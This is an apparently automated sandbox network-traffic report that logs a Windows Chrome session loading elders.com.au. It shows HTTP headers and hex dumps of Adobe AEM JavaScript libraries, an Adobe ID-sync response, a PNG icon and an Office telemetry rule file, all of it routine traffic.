                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 3d 65 26 26 28 65 3d 64 2e 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 28 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 43 51 55 52 4c 49 6e 66 6f 29 65 3d 43 51 55 52 4c 49 6e 66 6f 2e 63 6f 6e 74 65 78 74 50 61 74 68 7c 7c 22 22 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 2c 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 6d 2e 65 78 65 63 28 61 5b 62 5d 2e 73 72 63 29 3b 69 66 28 66 29 72 65 74 75 72 6e 20 65 3d 66 5b 31 5d 7d 65 3d
                                                                                                                                    Data Ascii: nction(){null===e&&(e=d.detectContextPath());return e},detectContextPath:function(){try{if(window.CQURLInfo)e=CQURLInfo.contextPath||"";else{for(var a=document.getElementsByTagName("script"),b=0;b<a.length;b++){var f=m.exec(a[b].src);if(f)return e=f[1]}e=
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 61 63 65 28 2f 25 35 44 2f 67 2c 22 5d 22 29 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2f 67 2c 22 25 33 46 22 29 3b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 23 2f 67 2c 22 25 32 33 22 29 7d 2c 68 61 6e 64 6c 65 4c 6f 67 69 6e 52 65 64 69 72 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 29 7b 6e 3d 0a 21 30 3b 61 6c 65 72 74 28 47 72 61 6e 69 74 65 2e 49 31 38 6e 2e 67 65 74 28 22 59 6f 75 72 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 63 6f 6d 70 6c 65 74 65 64 20 62 65 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 62 65 65 6e 20 73 69 67 6e 65 64 20 6f 75 74 2e 22 29 29 3b 76 61 72 20 61 3d 63 2e 67 65 74 54 6f 70 57 69 6e 64 6f 77 28 29 2e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b
                                                                                                                                    Data Ascii: ace(/%5D/g,"]");a=a.replace(/\?/g,"%3F");return a=a.replace(/#/g,"%23")},handleLoginRedirect:function(){if(!n){n=!0;alert(Granite.I18n.get("Your request could not be completed because you have been signed out."));var a=c.getTopWindow().document.location;
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 62 3d 62 7c 7c 64 2e 67 65 74 4c 6f 63 61 6c 65 28 29 3b 69 66 28 21 68 5b 62 5d 29 7b 70 3d 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 64 2e 50 53 45 55 44 4f 5f 4c 41 4e 47 55 41 47 45 29 3b 74 72 79 7b 76 61 72 20 66 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 6c 3d 66 2e 6f 70 65 6e 2c 6b 3d 63 2e 65 78 74 65 72 6e 61 6c 69 7a 65 3b 76 61 72 20 71 3d 62 3b 69 66 28 61 29 76 61 72 20 72 3d 65 2b 71 2b 6d 3b 65 6c 73 65 7b 76 61 72 20 74 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 74 6d 6c 22 29 3b 75 26 26 28 74 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 31 38 6e 2d 64 69 63 74 69 6f 6e 61 72 79 2d 73 72 63 22 29 29 3b 72 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 22 7b 6c 6f
                                                                                                                                    Data Ascii: b=b||d.getLocale();if(!h[b]){p=0===b.indexOf(d.PSEUDO_LANGUAGE);try{var f=new XMLHttpRequest,l=f.open,k=c.externalize;var q=b;if(a)var r=e+q+m;else{var t,u=document.querySelector("html");u&&(t=u.getAttribute("data-i18n-dictionary-src"));r=t?t.replace("{lo
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 28 29 7d 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 54 6f 75 63 68 49 6e 64 69 63 61 74 6f 72 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 7b 7d 2c 68 3d 5b 5d 3b 72 65 74 75 72 6e 7b 64 65 62 75 67 57 69 74 68 4d 6f 75 73 65 3a 21 31 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 65 2e 75 70 64 61 74 65 28 67 2e 74 6f 75 63 68 65 73 29 3b 72 65 74 75 72 6e 21 30
                                                                                                                                    Data Ascii: ()});(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).TouchIndicator=c()})(function(){var c={},h=[];return{debugWithMouse:!1,init:function(){var e=this,m=function(g){e.update(g.touches);return!0
                                                                                                                                    2024-11-05 08:03:25 UTC934INData Raw: 29 7d 3b 68 2e 67 65 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 68 2e 67 65 74 57 68 69 74 65 6c 69 73 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 3b 68 2e 69 73 4f 70 74 65 64 4f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 70 3d 30 3b 70 3c 67 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 7b 76 61 72 20 6e 3d 67 5b 70 5d 2e 73 70 6c 69 74 28 22 5c 78 33 64 22 29 5b 30 5d 3b 6e 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3f 6e 2e 74 72 69 6d 28 29 3a 6e 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30
                                                                                                                                    Data Ascii: )};h.getCookieNames=function(){return e};h.getWhitelistCookieNames=function(){return m};h.isOptedOut=function(){for(var g=document.cookie.split(";"),p=0;p<g.length;p++){var n=g[p].split("\x3d")[0];n=String.prototype.trim?n.trim():n.replace(/^[\s\uFEFF\xA0
                                                                                                                                    2024-11-05 08:03:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    128192.168.2.44989934.251.39.1344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC713OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730793803403 HTTP/1.1
                                                                                                                                    Host: dpm.demdex.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:25 UTC818INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: application/json;charset=utf-8
                                                                                                                                    Content-Length: 370
                                                                                                                                    Connection: close
                                                                                                                                    X-TID: UPi7GyQLR9U=
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                    Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                    P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                    Access-Control-Allow-Origin: https://elders.com.au
                                                                                                                                    Vary: Origin
                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                    DCS: dcs-prod-irl1-2-v067-0e2a0bf10.edge-irl1.demdex.com 7 ms
                                                                                                                                    set-cookie: demdex=50828223440744139920245021373270661928; Max-Age=15552000; Expires=Sun, 04 May 2025 08:03:25 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                    2024-11-05 08:03:25 UTC370INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 35 35 37 34 34 36 32 37 35 32 31 38 35 38 38 32 38 38 35 30 36 32 37 30 36 36 39 34 30 35 37 37 30 30 36 39 38 31 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 36 47 31 79 6e 59 63 4c 50 75 69 51 78 59 5a 72 73 7a 5f 70 6b 71 66 4c 47 39 79 4d 58 42 70 62 32 7a 58 35 64 76 4a 64 59 51 4a 7a 50 58 49 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                    Data Ascii: {"d_mid":"55744627521858828850627066940577006981","id_sync_ttl":604800,"d_blob":"6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    129192.168.2.449908162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC642OUTGET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:25 UTC679INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: max-age=2592000, public, immutable
                                                                                                                                    last-modified: Tue, 05 Nov 2024 06:39:17 GMT
                                                                                                                                    etag: W/"e61-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210133-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730793805.294167,VS0,VS0,VE1
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: BYPASS
                                                                                                                                    Set-Cookie: affinity="14b7d00527153a43"; Path=/; HttpOnly; secure
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c2fb402e6b-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC690INData Raw: 65 36 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 67 2c 65 29 7b 65 2e 47 72 61 6e 69 74 65 3d 65 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 3b 65 2e 47 72 61 6e 69 74 65 2e 24 3d 65 2e 47 72 61 6e 69 74 65 2e 24 7c 7c 67 3b 65 2e 5f 67 3d 65 2e 5f 67 7c 7c 7b 7d 3b 65 2e 5f 67 2e 24 3d 65 2e 5f 67 2e 24 7c 7c 67 3b 76 61 72 20 6b 3d 47 72 61 6e 69 74 65 2e 48 54 54 50 3b 67 2e 61 6a 61 78 53 65 74 75 70 28 7b 65 78 74 65 72 6e 61 6c 69 7a 65 3a 21 30 2c 65 6e 63 6f 64 65 50 61 74 68 3a 21 30 2c 68 6f 6f 6b 3a 21 30 2c 62 65 66 6f 72 65 53 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 63 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 47 5f 49 53 5f 48 4f 4f 4b 45 44 26 26 47 5f 49 53 5f 48 4f 4f 4b 45 44 28 63 2e 75 72 6c 29 7c 7c 28 63 2e 65 78
                                                                                                                                    Data Ascii: e61(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.ex
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 63 73 72 66 7c 7c 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 63 73 72 66 3d 67 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 2e 48 54 54 50 29 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 67 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 76 61 72 20 62 3d 22 2f 2f 22 2b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 62 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 64 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 64 2b 22 2f 22 7c 7c 61 3d 3d 3d 62 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 62 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 62 2b 22 2f 22
                                                                                                                                    Data Ascii: csrf||(window.Granite.csrf=g(window.Granite.HTTP))})(function(g){function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"
                                                                                                                                    2024-11-05 08:03:25 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 65 78 65 63 75 74 65 28 22 72 65 73 6f 6c 76 65 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 72 65 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 65 78 65 63 75 74 65 28 22 72 65 6a 65 63 74 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 5f 65 78 65 63 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 63 6f 6d 70 6c 65 74 65 64 2e 22 29 3b 0a 66 6f 72 28 76 61 72 20 64 3d 30 2c 74 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 2e 6c 65 6e 67 74 68 3b 64 3c 74 3b 64 2b 2b 29 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 5b 64 5d 5b 61 5d 2e 61 70 70 6c 79 28
                                                                                                                                    Data Ascii: tion(){this._execute("resolve",arguments)},reject:function(){this._execute("reject",arguments)},_execute:function(a,b){if(null===this._handler)throw Error("Promise already completed.");for(var d=0,t=this._handler.length;d<t;d++)this._handler[d][a].apply(
                                                                                                                                    2024-11-05 08:03:25 UTC260INData Raw: 29 7b 61 2e 73 72 63 26 26 61 2e 73 72 63 2e 6c 65 6e 67 74 68 26 26 6b 28 61 2e 73 72 63 29 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 55 6e 61 62 6c 65 20 74 6f 20 61 74 74 61 63 68 20 43 53 52 46 20 74 6f 6b 65 6e 20 74 6f 20 61 6e 20 69 66 72 61 6d 65 20 65 6c 65 6d 65 6e 74 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 6f 72 69 67 69 6e 22 29 7d 72 65 74 75 72 6e 20 61 7d 7d 63 28 29 3b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 28 29 7d 2c 33 45 35 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 73 65 64 3a 21 31 2c 72 65 66 72 65 73 68 54 6f 6b 65 6e 3a 63 2c 5f 63 6c 65 61 72 54 6f 6b 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 3d 76 6f 69 64 20 30 3b 63 28 29 7d 7d
                                                                                                                                    Data Ascii: ){a.src&&a.src.length&&k(a.src)&&window.console&&console.error("Unable to attach CSRF token to an iframe element on the same origin")}return a}}c();setInterval(function(){c()},3E5);return{initialised:!1,refreshToken:c,_clearToken:function(){f=void 0;c()}}
                                                                                                                                    2024-11-05 08:03:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    130192.168.2.449910162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC511OUTGET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:25 UTC556INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 817
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    last-modified: Tue, 22 Nov 2022 06:53:37 GMT
                                                                                                                                    etag: "331-5ee09a19b9e40"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210130-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730793804.813343,VS0,VS0,VE689
                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c2fcc7e85b-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC813INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 1b 08 06 00 00 00 1d c7 8d 9a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 c6 49 44 41 54 78 01 c5 56 4b 52 db 40 10 ed 9e 11 d9 a4 42 b4 4f e1 9a 2a f0 26 0b b0 4e 00 3e 41 e0 04 21 27 80 9c 20 e4 04 e0 13 00 27 80 1b c4 9c c0 c2 2c a1 8a 21 24 55 d9 a1 7c 36 c1 9a e9 74 5b 52 61 1b 64 e4 60 27 af ca fa 78 a6 d5 6f fa 8f 67 b5 fa 16 11 ad 01 60 02 00 27 00 f4 16 10 d6 10 20 4e 6f d3 8d e8 9b b5 1d 63 0c 24 90 44 89 95 3d 53 05 76 6b 8b 97 7c 33 25 eb 09 10 c4 42 48 5e 08 e0 fd ca e7 8b 3d 98 22 14 01 b6 c6 ac 87 85 72 01 12 4d df 02 72 39 ad 2d ee 21 e0 d6 23 7b c5 1a 6d 42
                                                                                                                                    Data Ascii: PNGIHDR pHYssRGBgAMAaIDATxVKR@BO*&N>A!' ',!$U|6t[Rad`'xog`' Noc$D=Svk|3%BH^="rMr9-!#{mB
                                                                                                                                    2024-11-05 08:03:25 UTC4INData Raw: ae 42 60 82
                                                                                                                                    Data Ascii: B`


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    131192.168.2.449914162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC725OUTGET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:25 UTC596INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Content-Length: 16
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Sat, 09 Mar 2024 18:21:32 GMT
                                                                                                                                    etag: W/"10-2386f26fb1bdc0"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-sjc1000127-SJC
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1710183889.084560,VS0,VS0,VE1
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1068790
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c68f8e4757-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC16INData Raw: 77 69 6e 64 6f 77 2e 24 43 51 3d 5f 67 2e 24 3b
                                                                                                                                    Data Ascii: window.$CQ=_g.$;


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    132192.168.2.44991213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 474
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                                                                                    x-ms-request-id: 0386aeb1-901e-007b-0d55-2eac50000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080325Z-158dbd74bf4f5j9khC1SN17k9n00000003h00000000050d0
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:26 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
